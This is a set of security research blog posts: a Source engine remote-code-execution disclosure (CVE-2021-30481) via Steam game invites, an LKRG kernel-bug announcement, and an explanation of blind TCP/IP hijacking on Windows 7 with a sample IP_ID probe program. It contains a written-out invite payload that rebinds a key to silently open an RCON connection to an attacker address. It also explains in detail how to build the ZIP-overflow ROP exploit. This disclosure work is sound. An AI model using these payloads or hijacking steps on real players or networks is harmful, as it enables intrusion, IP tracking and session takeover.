With these tools, my general “process” for bug hunting is this:

  1. Find some section of the client code I feel is exploitable and want to look into more closely

  2. Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.

  3. From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.

  4. If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.

  5. Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the surface. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

CVE-2021-30481: Source engine remote code execution via game invites

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built-in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI, and much more beyond that, can generally be tweaked using console commands. This allows for funny things such as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do to configure something in your game client. This works by prefixing any console command with rcon before executing it. Doing so requires you to first connect and authenticate to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victim accepts the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate with the server. All of this is already very concerning, as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image [1] shows what RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk, nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg, where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything beforehand. Already, an attacker can upload arbitrary files if the victim accepts the game invite, and so far no memory corruption is required.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header, located in the central directory file header, is read into file_info_internal.offset_curfile. This makes it possible to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive, so s->byte_before_the_zipfile is 0). This is very similar to how file handling works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE, a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.
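
To make the arithmetic concrete, here is a minimal stand-alone sketch of the lufread() size calculation with the offset set to 0xFFFFFFFE (my own illustration, not the engine code; variable names mirror the excerpt above):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t pos    = 0xFFFFFFFE; /* attacker-controlled local file header offset */
	uint32_t len    = 0x200;      /* total size of the ZIP blob in memory         */
	uint32_t toread = 1;          /* unzlocal_getByte() asks for a single byte    */

	if (pos + toread > len)       /* 0xFFFFFFFF > 0x200, so the "clamp" is taken  */
		toread = len - pos;   /* 0x200 - 0xFFFFFFFE underflows to 0x202       */

	printf("toread = 0x%X\n", toread); /* prints 0x202, i.e. len + 2 */
	/* On the 32-bit target, buf + pos wraps around as well, so the resulting
	 * copy is equivalent to memcpy(ptr, buf - 2, len + 2) as shown above. */
	return 0;
}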

At this point, all that is left to do is to construct a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game, xinput1_3.dll, has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit working is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.
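
As a rough illustration of that first step (my own sketch, not the PoC code), corrupting the offset in an in-memory copy of a legitimate archive boils down to finding the central directory file header (signature PK\x01\x02) and overwriting the 4-byte "relative offset of local header" field, which sits 42 bytes into that header:

#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Patch the "relative offset of local header" field of the first central
 * directory file header found in the buffer. Returns 0 on success. */
int corrupt_local_header_offset(unsigned char *zip, size_t len)
{
	const unsigned char sig[4] = { 'P', 'K', 0x01, 0x02 };
	const uint32_t evil = 0xFFFFFFFE;

	for (size_t i = 0; i + 46 <= len; i++) {        /* 46 = fixed header size    */
		if (memcmp(zip + i, sig, 4) == 0) {
			memcpy(zip + i + 42, &evil, 4); /* little-endian host (x86)  */
			return 0;
		}
	}
	return -1;
}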

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit reach its full potential. One shellcode to rule them all; in other words, whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

We also bind +showscores so that Tab keeps showing the scoreboard.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my GitHub. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers, making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve now seems to use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. For those games, at least a warning is now displayed that shows the parameters your game is about to start with. The next image shows what such a warning looks like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, I feel it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure of this bug’s existence has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put, and are going to put, into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

  1. https://developer.valvesoftware.com/wiki/Source_RCON_Protocol 

LKRG 0.9.0 has been released!

During LKRG development and testing I’ve found 7 Linux kernel bugs, 4 of which have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

  • A deadlock issue which was not really addressed; the devs said they would take a look, but there have not been many updates on that.
  • A problem with the code related to the hwlatd kernel thread – it synchronizes incorrectly with its launcher / killer, so you can hit a WARN in the kernel at any time.

CVE-2021-3411 refers to 2 different types of bugs:

  • Broken KRETPROBE (recently reported)
  • Incompatibility of KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug in the kernel’s signal handling for a dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

However, I don’t remember if I found it during my work related to LKRG, so I’m not counting it here (otherwise it would be a total of 8 bugs, 5 of which would have CVEs).

Those are pretty bad stats… However, it might be an interesting story to tell alongside the announcement of the new LKRG version. It could also make an interesting conference talk.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

Windows 7 TCP/IP hijacking

Blind TCP/IP hijacking is still alive on Windows 7… and not only there. This version of Windows is certainly one of the “juiciest” targets, even though January 14th, 2020 was its official EOL (End Of Life). Based on various data, Windows 7 holds around a 25% share of the Operating Systems (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows including Windows 7 (the latest version at that time). It was an issue in the implementation of TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center) they acknowledged the bug exists, but they had their doubts about the impact of the issue claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes. However, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform a blind TCP/IP hijacking attack. This tool exploited exactly the same weaknesses in the TCP/IP stack which I had reported. That being said, Microsoft informed me that if I shared my tool (I didn’t want to do it), they would reconsider their decision. However, for now, no CVE would be allocated, and this problem was supposed to be addressed in Windows 8.

In the following months I started my work as an FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8. Over the years, I completely forgot about it. Nevertheless, when I left Microsoft, I was doing some cleanup on my old laptop and found my old tool. I copied it from the laptop and decided to revisit it once I had a bit more time. I found some time and thought that my tool deserves a release and a proper description.

What is TCP/IP hijacking?

Most likely the majority of readers are aware of what this is. For those who aren’t, I encourage you to read one of the many great articles about it which you can find on the internet these days.

It might be worth mentioning that probably the most famous blind TCP/IP hijacking attack was carried out by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initial TCP sequence numbers (ISNs).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately, it is not as catastrophic as it used to be. The main reason is that the majority of modern protocols implement encryption. Sure, it’s overwhelmingly bad if an attacker can hijack any established TCP/IP session. However, if the upper-layer protocols properly implement encryption, attackers are limited in terms of what they can do with it, unless they have the ability to correctly generate encrypted messages.

That being said, we still have widely deployed protocols which do not encrypt the traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin (hopefully?) can be seen only in the museum.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

The tool which I developed in 2008 implemented a known attack described by ‘lkm’ (a typo; the author’s real nickname is ‘klm’) in Phrack issue 64, which can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article (research) and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008) this attack could be executed successfully against many OSes modern at that time, including Windows 2K/XP and FreeBSD 4. I gave a live presentation of this attack against Windows XP at a local conference in Poland (SysDay 2009).

Before we move on to the details of how to perform the described attack, it is useful to recall in more detail how TCP handles the communication. Quoting the Phrack paper:

Each of the two hosts involved in the connection computes a 32bits SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time an host sends some packet with N bytes of data, it adds N to the SEQ number.

The sender put his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and next expected SEQ number from the other host (called RCV.NEXT.
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.

In short, in order to execute TCP/IP hijacking attack, we must know:

  • Client IP
  • Server IP (usually known)
  • Client port
  • Server port (usually known)
  • Sequence number of the client
  • Sequence number of the server

OK, but what does this have to do with the IP ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted to the Bugtraq mailing list a description of a new port scanning technique, known today as the “Idle scan”. The original post can be found here:

https://seclists.org/bugtraq/1998/Dec/79

and you can read more information about the Idle scan here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case, e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the IP_ID of the victim, we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending any packet to the victim which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with an IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]
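
As a rough illustration of such a probe (my own sketch, assuming Linux, IPv4 and root privileges; this is not the tool described later), reading the victim’s IP_ID via an ICMP echo request could look like this:

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

static unsigned short in_cksum(void *data, int len)
{
	unsigned long sum = 0;
	unsigned short *p = data;

	for (; len > 1; len -= 2)
		sum += *p++;
	if (len == 1)
		sum += *(unsigned char *)p;
	while (sum >> 16)
		sum = (sum & 0xffff) + (sum >> 16);
	return (unsigned short)~sum;
}

/* Send one ICMP echo request and return the IP_ID of the reply (-1 on error). */
static int probe_ip_id(int raw_sock, struct sockaddr_in *victim)
{
	struct icmphdr echo;
	unsigned char buf[1500];

	memset(&echo, 0, sizeof(echo));
	echo.type = ICMP_ECHO;
	echo.checksum = in_cksum(&echo, sizeof(echo));

	if (sendto(raw_sock, &echo, sizeof(echo), 0,
	           (struct sockaddr *)victim, sizeof(*victim)) < 0)
		return -1;
	if (recv(raw_sock, buf, sizeof(buf), 0) < (ssize_t)sizeof(struct iphdr))
		return -1;

	/* A raw ICMP socket hands us the full IP header of incoming packets. */
	return ntohs(((struct iphdr *)buf)->id);
}

int main(int argc, char **argv)
{
	struct sockaddr_in victim = { .sin_family = AF_INET };
	int sock, id1, id2;

	if (argc != 2) {
		fprintf(stderr, "usage: %s <victim ip>\n", argv[0]);
		return 1;
	}
	victim.sin_addr.s_addr = inet_addr(argv[1]);

	sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
	if (sock < 0) {
		perror("socket (root required)");
		return 1;
	}

	id1 = probe_ip_id(sock, &victim);
	sleep(1); /* "wait a little", as in the diagram above */
	id2 = probe_ip_id(sock, &victim);

	/* The victim sent (id2 - id1 - 1) other IP packets between our probes. */
	printf("IP_ID: %d -> %d\n", id1, id2);
	close(sock);
	return 0;
}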

This essentially creates some form of “covert channel” which can be exploited by a remote attacker to “discover” all the information necessary to execute a TCP/IP hijacking attack. How? Let’s quote the original Phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When the attacker guesses the client’s port correctly, the server replies to the real client (not the attacker) with an ACK. If the port was incorrect, the server replies to the real client with a SYN+ACK; since the real client never started a new connection, it replies to the server with an RST.

So, all we have to do to test if a guessed client-port is the correct one is:

– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.

Finding the server’s SND.NEXT

This is the essential part, and the best I can do is to quote (again) the Phrack article:

Whenever a host receive a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what is a correct seq/ack combination, as defined by the RFC793 [2]:

A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at last).

A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by an host must be lower or equal than the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).

It is important to node that the sequence number space is “circular”. For exemple, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK – receiver’s SND.NEXT) <= 0”.

Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.

If we look at the ACK checking formula, we note that if we pick randomly two ACK values, let’s call them ack1 and ack2, such as |ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2 will be an acceptable ack. If the real ACK is 0, or is between (2^32 – 1) and (2^31 + 1), then, the ack1 will be acceptable.

Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve the sending of two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. second packet) will have his ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at least one of the two packet will be accepted.

The sequence number space is way bigger than the client-port space, but two facts make this scan easier:

First, when the client receive our packet, it replies immediately. There’s not a problem with latency between client and server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and reducing greatly the odds that the client will have IP traffic between our probes and mess with our detection.

Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we need only to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentionned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND=64K, perform the scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, wen can try all SEQs such as seq = 32K + i64K for all i. Then, all SEQ such as seq=16k + i32k, and so on… narrowing the window, while avoiding to re-test already tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.

With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the way “server -> client”. This is not bad, but not terribly useful, we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. The described scenario works perfectly against Windows XP, but I encountered different behavior on Windows 7. Using the two edge-case ACK values to satisfy the ACK formula doesn’t really change anything; I get exactly the same results (on Windows 7 only) by always using just one of the edge values for the ACK. Originally, I thought that my implementation of the attack was not working against Windows 7. However, after some tests and tuning, it turned out that’s not the case. I’m not sure why or what I’m missing, but in the end you can send half as many packets and speed up the overall attack.
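
For reference, the signed, circular ACK check quoted above can be expressed in a few lines (my own illustration, not code from the tool), which also shows why two ACK values exactly 2^31 apart guarantee that at least one of them is accepted:

#include <stdint.h>
#include <stdio.h>

/* The RFC 793-style check quoted above: an ACK is acceptable iff
 * (ACK - SND.NXT) <= 0 in signed 32-bit arithmetic. */
static int ack_acceptable(uint32_t ack, uint32_t snd_nxt)
{
	return (int32_t)(ack - snd_nxt) <= 0;
}

int main(void)
{
	/* ack1 and ack2 are exactly 2^31 apart, so at least one of them is
	 * always accepted, whatever the receiver's real SND.NXT happens to be. */
	uint32_t ack1 = 0x00000000, ack2 = 0x80000000;
	uint32_t samples[] = { 0x00000001, 0x7FFFFFFF, 0x80000001, 0xFFFFFFFF };

	for (unsigned i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
		printf("SND.NXT=0x%08X  ack1 ok=%d  ack2 ok=%d\n", samples[i],
		       ack_acceptable(ack1, samples[i]),
		       ack_acceptable(ack2, samples[i]));
	return 0;
}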

Finding the client’s SND.NEXT

Quote:

What we can do to find the client’s SND.NEXT ? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vunerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.

However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.

If we detect that our ACK was acceptable, that means that (guessed_ACK – SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it, that (guessed_ACK – SND_NEXT) > 0.

Using this knowledge, we can find the exact SND_NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence space is circular).

Now, at last we have all the required informations and we can perform the session hijacking from either client or server.

(Un)fortunately, here Windows 7 is different as well. This is connected to the differences in the previous stage, in how it handles the correctness of the ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND_NEXT) > 0), Windows 7 won’t send any packet back to the server. Essentially, we are blind here and we can’t do the same amazingly effective ‘binary search’ to find the correct ACK. However, we are not completely lost. We can always brute-force the ACK if we have the correct SQN. Again, we don’t need to verify every possible value of the ACK; we can still use the same trick with the TCP window size. Nevertheless, to be more effective and not miss the correct ACK brackets, I’ve chosen to use a window size value of 0x3FF. Essentially, we are flooding the server with spoofed packets containing our payload for injection, with the correct SQN and a guessed ACK. This operation takes around 5 minutes and is effective 🙂 Nevertheless, if for any reason our payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.
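
As a rough back-of-the-envelope (my own illustration, assuming we simply step the guessed ACK by the chosen window size), the number of spoofed segments needed to sweep the whole 32-bit ACK space looks like this:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	const uint64_t ack_space = 1ULL << 32;
	const uint32_t windows[] = { 0xFFFF, 0x3FF, 0xFF }; /* assumed window sizes */

	for (unsigned i = 0; i < sizeof(windows) / sizeof(windows[0]); i++)
		printf("window 0x%04X -> ~%llu spoofed packets\n", windows[i],
		       (unsigned long long)(ack_space / (windows[i] + 1ULL)));
	return 0;
}

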